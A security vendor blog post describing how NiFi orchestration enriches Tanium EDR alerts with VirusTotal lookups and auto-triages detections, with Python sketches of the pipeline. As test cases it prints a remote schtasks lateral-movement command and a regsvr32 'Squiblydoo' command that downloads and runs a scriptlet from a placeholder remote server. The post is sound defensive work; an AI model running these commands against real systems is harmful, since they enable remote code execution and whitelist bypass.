Signal the ATT&CK: Part 2

05/07/18


Using orchestration and automation to enhance EDR capabilities, and to reduce ‘alert fatigue’

By Paul Bottomley, Endpoint Threat Detection and Response Lead, and
Wietze Beukema, Endpoint Threat Detection and Response Analyst.

Introduction

This is the second part of our ‘Signal the ATT&CK’ article, where we explore security orchestration and automation (collectively referred to as orchestration) and its use in enhancing our Endpoint Detection and Response (EDR) capability. In part 1, we discussed the use of the MITRE ATT&CK matrix and MITRE’s CALDERA in our Tanium Signal development and testing process. Since part 1 was published, we have added 150 Signals to our rule base, which takes the total number of Signals in our detection set to well over 500. Our current ATT&CK coverage can be seen in the diagram below, which is taken from the ATT&CK Navigator. Techniques we have developed Signals for are highlighted in green. Those highlighted in grey we deem out of scope from an endpoint threat detection perspective, and better suited to other technologies such as Network Intrusion Detection Systems (NIDS).

Our journey into orchestration began when redesigning our back-end EDR platform. The high-level concept was to take Tanium Signal alerts and pass them through a scalable data processing pipeline where they would be committed to an Elasticsearch cluster for a team of analysts to triage. The approach we took made use of human-centered design: “...a human-centered approach fuels the creation of products that resonate more deeply with an audience — ultimately driving engagement and growth”. This concept is important because many products fail not because the team failed to build what it set out to build, but because the wrong product was built - one that does not take into account what the problem is and why it matters.

The human perspective of the design process began with creating personas. We defined multiple ‘threat detection analyst’ personas that very quickly surfaced a number of interesting behaviours and pain-points, two of which we will focus on in this article that relate to orchestration:

  1. Alert overload - Commonly referred to as ‘alert fatigue’, this is where analysts are inundated with detections. Ultimately, this leads to an increase in operational risk due to detections being overlooked; and,

  2. Frustration of manual enrichment - Having to manually look up indicators against threat intelligence datasets, and to manually pull related endpoint artefacts.

These two pain-points led to the following design principles:

  1. [Alert overload] - The platform needs to suppress known false positive (FP) events;

  2. [Alert overload] - The platform needs to auto-categorise known true positive (TP) events;

  3. [Frustration of manual enrichment] - The platform needs to automatically enrich indicators against threat intelligence datasets; and,

  4. [Frustration of manual enrichment] - The platform needs to automatically acquire related process, network, file and Windows Registry artefacts.

For the remainder of this article, points 3 and 4 will be collectively referred to as ‘enrichment’.

By considering these design principles, we sought to identify a highly configurable component that would act as a layer of connective tissue within our threat detection ecosystem, allowing us to automate the flow of data between systems and execute decisions. This led us to Apache NiFi (“NiFi”).

Automating enrichment and reducing alert fatigue using NiFi

NiFi is an open-source dataflow automation tool, maintained by the Apache Software Foundation. The Java-powered software uses flow-based programming concepts to perform a sequence of tasks based on information it processes. Simply put, it is a tool that manages the flow and transformation of information between systems.

NiFi’s flow-based approach makes it a powerful means of managing complex dataflows - its graphical interface visualises the flow of data in real time, highlights current bottlenecks, and provides the flexibility to modify flows. In addition, its highly scalable architecture makes it both efficient and flexible when handling high volumes of data.

Data in NiFi takes the form of flowfiles, which consist of content (the actual data) and supporting attributes. At the start of a dataflow, a flowfile contains only raw data; by the end of the dataflow it has typically been transformed and enriched. This is achieved using processors, which consume, analyse and transform data. Out of the box, NiFi includes a comprehensive set of processors, allowing seamless integration with existing data sources such as SQL databases, Elasticsearch, MongoDB and Kafka instances. These capabilities make NiFi a very powerful tool for orchestration.
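
To illustrate the concept (NiFi itself is a Java application configured through its web UI, so the following Python is purely a conceptual sketch), a flowfile can be thought of as content plus attributes, and a processor as a function that transforms one flowfile into another:

from dataclasses import dataclass, field
import json

@dataclass
class FlowFile:
    content: bytes                                   # the actual data
    attributes: dict = field(default_factory=dict)   # supporting metadata

def extract_md5_attribute(flowfile: FlowFile) -> FlowFile:
    # A 'processor': parse the content and promote a value to an attribute.
    doc = json.loads(flowfile.content)
    if "md5" in doc:
        flowfile.attributes["md5"] = doc["md5"]
    return flowfile

# A dataflow is, conceptually, a chain of processors applied to each flowfile.
raw = FlowFile(content=b'{"md5": "d41d8cd98f00b204e9800998ecf8427e"}')
enriched = extract_md5_attribute(raw)
print(enriched.attributes)   # {'md5': 'd41d8cd98f00b204e9800998ecf8427e'}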

Over the last few months, we’ve been implementing our design principles in a NiFi dataflow. Tanium Signal alerts, as well as broad sets of telemetry acquired using the Tanium platform (for example, running process details, driver details, and loaded module details), are passed through a scalable pipeline before being indexed in an Elasticsearch cluster. NiFi connects to Elasticsearch and the dataflow begins execution.

To explain orchestration in our context, we will describe one of our dataflow components, VirusTotal enrichment, which addresses design principle 3: the platform needs to automatically enrich indicators against threat intelligence datasets.

Automatically enriching indicators against VirusTotal

Our threat intelligence is derived through research conducted by our in-house experts, informed by our global incident response services and a large global network of trusted intelligence sharing relationships. We also enrich against external sources, one being VirusTotal, which we will discuss in this article.

The purpose of this dataflow component, which comprises multiple processors, is to enrich documents in our Elasticsearch cluster that have an MD5 hash with information from VirusTotal. It is inevitable that the same MD5 hash will appear across multiple systems, so to keep our enrichment efficient we maintain a local cache of VirusTotal results. Every time we want to enrich an MD5 hash, we check the cache first before querying the VirusTotal API.

At a high level, the dataflow logic is as follows (a short code sketch appears after the list):

  1. Retrieve MD5 hashes that are to be enriched;
  2. Perform a lookup against the VirusTotal cache - if information about the MD5 hash already exists, retrieve it; else query the VirusTotal API; and,
  3. Update Elasticsearch.
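
As a minimal Python sketch of this cache-first logic (the actual implementation is a chain of NiFi processors, described in the next list; the names and stubbed API lookup here are purely illustrative):

def enrich_md5(md5, vt_cache, query_vt_api):
    """Return VT attributes for a hash, hitting the API only on cache misses."""
    if md5 not in vt_cache:               # cache miss: query the VirusTotal API
        vt_cache[md5] = query_vt_api(md5)
    return vt_cache[md5]                  # cache hit: no API call needed

# Example with a stubbed API lookup:
vt_cache = {}
fake_api = lambda md5: {"positives": 54, "total": 68}
print(enrich_md5("d41d8cd98f00b204e9800998ecf8427e", vt_cache, fake_api))  # queries the stub
print(enrich_md5("d41d8cd98f00b204e9800998ecf8427e", vt_cache, fake_api))  # served from cache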

At a more granular level, the steps performed by NiFi are (steps 1 and 4 are sketched in code after the list):

  1. Get Unprocessed MD5s: Query Elasticsearch for documents that have the md5 field set and do not have the vt_enriched field set.
        a. For each unique MD5 hash found, check if the MD5 appears in our VirusTotal cache.
            i. If the hash is found in our cache, set the vt_enriched attribute to ‘Yes’ and add the attributes found in the VirusTotal cache to the flowfile. Then forward the flowfile to ‘MD5s already in cache’; or,
            ii. If the hash is not found in our cache, set the vt_enriched attribute to ‘No’. Then forward the flowfile to ‘MD5s not in cache’.
  2. VT Enrichment: This is a process group that queries the VirusTotal API - it is discussed in more detail below;
  3. Generate Output: Transform the flowfile attributes provided by the previous step. This includes, amongst other things, the removal of irrelevant information provided by VirusTotal, the renaming of fields, and the creation of additional fields; and,
  4. Bulk Update MD5s: Commit the changes to Elasticsearch. Every incoming flowfile has an MD5 hash and a set of attributes; this step will update every unprocessed document in Elasticsearch with the same MD5 hash with the given attributes.
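
To make steps 1 and 4 concrete, here is a sketch of the equivalent calls using the elasticsearch Python client. The index name ‘alerts’ and the cluster address are illustrative assumptions; in our platform these steps are performed by NiFi processors:

from elasticsearch import Elasticsearch

es = Elasticsearch("http://localhost:9200")   # assumed cluster address

# Step 1: documents that have an md5 field but no vt_enriched field yet.
unprocessed = es.search(index="alerts", body={
    "query": {"bool": {
        "filter":   [{"exists": {"field": "md5"}}],
        "must_not": [{"exists": {"field": "vt_enriched"}}]
    }}
})

# Step 4: apply the enrichment attributes to every document sharing the hash.
def bulk_update_md5(md5, attrs):
    es.update_by_query(index="alerts", body={
        "query": {"term": {"md5": md5}},
        "script": {
            "source": "ctx._source.putAll(params.attrs)",
            "params": {"attrs": attrs}
        }
    })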

The VT Enrichment process group is mainly responsible for querying the VirusTotal API and updating our VirusTotal cache. In addition, it contains logic to call the VirusTotal API to request re-analysis of MD5 hashes if certain conditions are met.

The steps for the VT Enrichment group are (a sketch of the API calls follows the list):

  1. Query VT Report API:
        a. Get MD5 hashes from the MD5s input port;
        b. Group the MD5 hashes, and query the VirusTotal Report API;
        c. Parse the results and add them as flowfile attributes; and,
        d. Forward the flowfile to VT Answered.
  2. Update VT Cache: For each flowfile, create a new document in our VirusTotal cache with the flowfile’s attributes as fields.
  3. Check VT Rescan Necessity: Various checks are carried out to determine whether or not an MD5 hash should be rescanned. For example, if the last scan is more than 30 days old, and various other conditions hold, a rescan will be necessary.
        a. If no rescan is required, forward the flowfile to No Rescan Required; or,
        b. If a rescan is required, forward the flowfile to Rescan Necessary.
  4. Request VT Rescan:
        a. Get flowfiles from the Rescan Necessary input;
        b. For each flowfile, check whether it has been sent for rescan before.
            i. If it has, it means the MD5 hash was sent for rescan but the new results were not yet ready after 10 minutes. To wait another 10 minutes, the flowfile is forwarded to Rescan Request Successful straight away; or,
            ii. If it has not, continue.
        c. Group the MD5 hashes, and query the VirusTotal Rescan API;
        d. Parse the results to ensure the rescan was requested successfully; and,
        e. Forward the flowfiles to Rescan Request Successful.
  5. Wait: Hold the incoming flowfiles for 10 minutes, before releasing them back to Query VT Report API. This allows VirusTotal to re-analyse the file belonging to the MD5 hash.
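
To ground steps 1, 3 and 4, here is a minimal Python sketch against VirusTotal’s legacy v2 REST API (the version current at the time of writing). The API key, the 30-day threshold and the function names are illustrative; in our platform these calls are made by NiFi processors:

from datetime import datetime, timedelta
import requests

API_KEY = "<your VirusTotal API key>"   # assumption: a valid v2 API key
VT = "https://www.virustotal.com/vtapi/v2"

def query_vt_report(md5s):
    # Step 1: hashes can be grouped into one comma-separated 'resource' value.
    r = requests.get(f"{VT}/file/report",
                     params={"apikey": API_KEY, "resource": ",".join(md5s)})
    r.raise_for_status()                # unexpected HTTP codes route to failure
    reports = r.json()
    return reports if isinstance(reports, list) else [reports]

def rescan_necessary(report, max_age_days=30):
    # Step 3 (one example condition): the last scan is more than 30 days old.
    last_scan = datetime.strptime(report["scan_date"], "%Y-%m-%d %H:%M:%S")
    return datetime.utcnow() - last_scan > timedelta(days=max_age_days)

def request_vt_rescan(md5s):
    # Step 4: ask VirusTotal to re-analyse the files behind the grouped hashes.
    r = requests.post(f"{VT}/file/rescan",
                      params={"apikey": API_KEY, "resource": ",".join(md5s)})
    r.raise_for_status()
    return r.json()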

Whenever something unexpected happens (for example, the VirusTotal API returns an invalid HTTP response code), the affected flowfiles are forwarded to failure, as is also shown in the diagram. Using another set of processors, we log such events, or even notify an analyst straight away via email or Slack integration.
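
As an example of the latter, a failure notification could be as simple as a POST to a Slack incoming webhook (the webhook URL below is a placeholder, and the message format is our own illustration):

import requests

SLACK_WEBHOOK = "https://hooks.slack.com/services/<your-webhook-path>"

def notify_failure(flowfile_attributes, error):
    # Push a short, human-readable alert into the analysts' Slack channel.
    text = f"VT enrichment failure for {flowfile_attributes.get('md5')}: {error}"
    requests.post(SLACK_WEBHOOK, json={"text": text})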

Orchestration in action

We will reuse two of the attacker techniques described in part 1 of our blog series to demonstrate our orchestration. Please refer to Microsoft MSDN documentation for a full description of the parameters used in the following examples.

Scheduled Task

The first example demonstrates the use of schtasks.exe to create the named task ‘myTask’ on remote machine ‘tanium-agent-4’. The execution of this task, which runs under the context of ‘user1’, is set to run daily and invokes ‘c:\windows\temp\payload.exe’.

schtasks.exe /s tanium-agent-4 /u user1 /p <password> /create /tn myTask /tr c:\windows\temp\payload.exe /sc DAILY

Executing this command will trigger the following Signal:

[lateral_movement]-[medium]-remote_scheduled_task_creation_using_schtasks

Without the use of our NiFi dataflow, the detection in our analytics platform provides little context to the analyst and is not practical to review, given that no enhanced formatting has been applied. The main focus of triage when this Signal fires is to determine the nature of the payload, in this example ‘c:\windows\temp\payload.exe’.

Addressing the pain point ‘frustration of manual enrichment’, our goal is to provide the analyst with a richer and more comprehensive understanding of the alert, increasing the degree of confidence when analysing the detection. Orchestration in this context involves:

  1. Calculating the MD5 hash of ‘c:\windows\temp\payload.exe’ on ‘tanium-agent-4’, sending the hash to a threat intelligence reputation engine and appending intelligence results to the alert (a hashing sketch follows this list); and,
  2. If applicable (a decision based on the result of action #1), pulling related endpoint artefacts.
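
The hash calculation in step 1 amounts to something like the following (in practice the hash is collected on the endpoint via the Tanium platform; this standalone Python version is purely illustrative):

import hashlib

def md5_of_file(path, chunk_size=8192):
    digest = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)    # stream the file to handle large payloads
    return digest.hexdigest()

# e.g. md5_of_file(r"c:\windows\temp\payload.exe") on the affected endpoint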

Once our NiFi dataflow has processed this alert, the detection looks very different in our platform. The analyst is presented with a nicely parsed process tree and can conclude ‘c:\windows\temp\payload.exe’ is malicious based on the ‘schtask_outcome’ field reporting the executable file as ‘mimikatz’.

Pulling related endpoint artefacts on the schtasks.exe process did not yield any further context in this example.

We have also created the ability for an analyst to mark a detection as ‘good’, ‘suspicious’ or ‘bad’ and even attribute a detection to a threat actor using our ‘tagging’ functionality. In this example, the analyst marks the detection as malicious. Not only will this tag the current event, but the workflow in NiFi will retrospectively tag all historic detections in the platform that are identical to this detection.

Let’s trigger this alert again. Our NiFi dataflow takes care of the subsequent detection by auto-categorising this alert as malicious. The detection is a known TP event, which addresses the pain point ‘alert overload’ - the analyst does not have to review this subsequent alert; it is automatically reported on a high-severity findings dashboard. The same logic is the basis for suppressing known FPs - if identical detections have been marked as ‘good’ by multiple analysts, future detections will be auto-categorised.
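
A simplified version of this auto-categorisation rule might look as follows; the verdict threshold, field names and category labels are illustrative assumptions, not our production logic:

def auto_categorise(detection, history):
    """history: prior analyst verdicts for detections identical to this one."""
    verdicts = [h["tag"] for h in history
                if h["signature"] == detection["signature"]]
    if "bad" in verdicts:
        return "known_tp"             # report on the high-severity dashboard
    if verdicts.count("good") >= 2:   # multiple analysts agreed it is benign
        return "suppressed_fp"        # suppress: no analyst review needed
    return "triage"                   # novel detection: route to an analyst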

Regsvr32

The following example demonstrates the use of regsvr32.exe to download the remote Windows scriptlet file ‘http://remote_server/payload.sct’.

regsvr32.exe /u /n /s /i:http://remote_server/payload.sct scrobj.dll

Executing this command will trigger the following Signals:

[execution]-[high]-regsvr32_making_suspicious_outbound_connections
[evasion]-[high]-regsvr32_calling_scrobj.dll_-_whitelist_bypass
[evasion]-[high]-regsvr32_interacts_with_sct_file_(possible_Squiblydoo_attack)

Again, without the use of our NiFi dataflow, the detection in our analytics platform provides little context to the analyst. The focus when this group of Signals fires would be to determine the reputation of the remote server the sct file is being pulled from, and the subsequent system activity resulting from the execution of ‘regsvr32.exe’.

Orchestration in this example involves:

  1. Performing a reputation check of ‘http://remote_server’ by sending the URL to a threat intelligence reputation engine and appending intelligence results to the alert; and,
  2. If applicable (based on the result of 1), retrieving related endpoint artefacts.

If a local file were passed as a command-line argument (rather than a URL), another step in the orchestration process could be to determine the nature of that payload.
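
The reputation check in step 1 could, for example, be performed against VirusTotal’s legacy v2 URL report endpoint; the sketch below is illustrative, with a placeholder API key:

import requests

API_KEY = "<your VirusTotal API key>"   # assumption: a valid v2 API key

def url_reputation(url):
    r = requests.get("https://www.virustotal.com/vtapi/v2/url/report",
                     params={"apikey": API_KEY, "resource": url})
    r.raise_for_status()
    report = r.json()
    # 'positives' is the number of engines that flag the URL as malicious.
    return report.get("positives", 0), report.get("total", 0)

# e.g. url_reputation("http://remote_server/payload.sct")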

Once again, the detection looks very different in our platform now that our NiFi dataflow has processed this alert. The analyst can conclude straight away the URL is malicious based on the ‘script_outcome’ field reporting a result of ‘malicious’, without having to carry out manual lookups on the URL or the file.

We have also retrieved related endpoint artefacts as a result of regsvr32.exe executing. We observe a ‘.sct’ file being written to disk, a process spawn (‘calc.exe’), and a network connection.

Lastly, an analyst has the ability to comment on as well as tag detections. The comment can be used to explain why the analyst has tagged the event as such, and to support reporting.

Conclusion

In summary, incorporating NiFi in our EDR process helps us in multiple ways:

  1. To reduce analyst alert fatigue by suppressing known FP detections;
  2. To reduce analyst alert fatigue by auto-categorising known TP events; and,
  3. To provide analysts with context of a detection by applying threat intelligence and pulling related endpoint artefacts.


Additional insight from Tanium

Tanium’s Cyber Security team have written two articles on applying the ATT&CK matrix when building a detection capability. They discuss developing a mechanism to identify gaps in capability and assigning corresponding risks to those gaps. More information can be found at the following links:

https://www.tanium.com/blog/getting-started-with-the-mitre-att-and-ck-framework-lessons-learned/

https://www.tanium.com/blog/getting-started-with-the-mitre-attack-framework-improving-detection-capabilities/


Tanium CONVERGE

Join us at Tanium CONVERGE in Washington, D.C., November 12-15, where we will be presenting ‘Signal the ATT&CK’ in greater depth. This will be a fantastic opportunity to meet our EDR team and exchange ideas.

Get in touch

Are you running Tanium in your network? We are more than happy to discuss security orchestration and automation with you in more depth, and how PwC can help enhance your security capability through it. We also have a comprehensive set of over 500 Signals, available on a subscription basis - our current coverage against the ATT&CK matrix is highlighted in the diagram above.

For more information, drop an email to Paul or Wietze using the contact details below.

Contact us

Paul Bottomley
Endpoint Threat Detection and Response Lead, PwC United Kingdom
Tel: +44 (0)7808 799134
Email

Wietze Beukema
Endpoint Threat Detection and Response Analyst, PwC United Kingdom
Tel: +44 (0)7850 908221
Email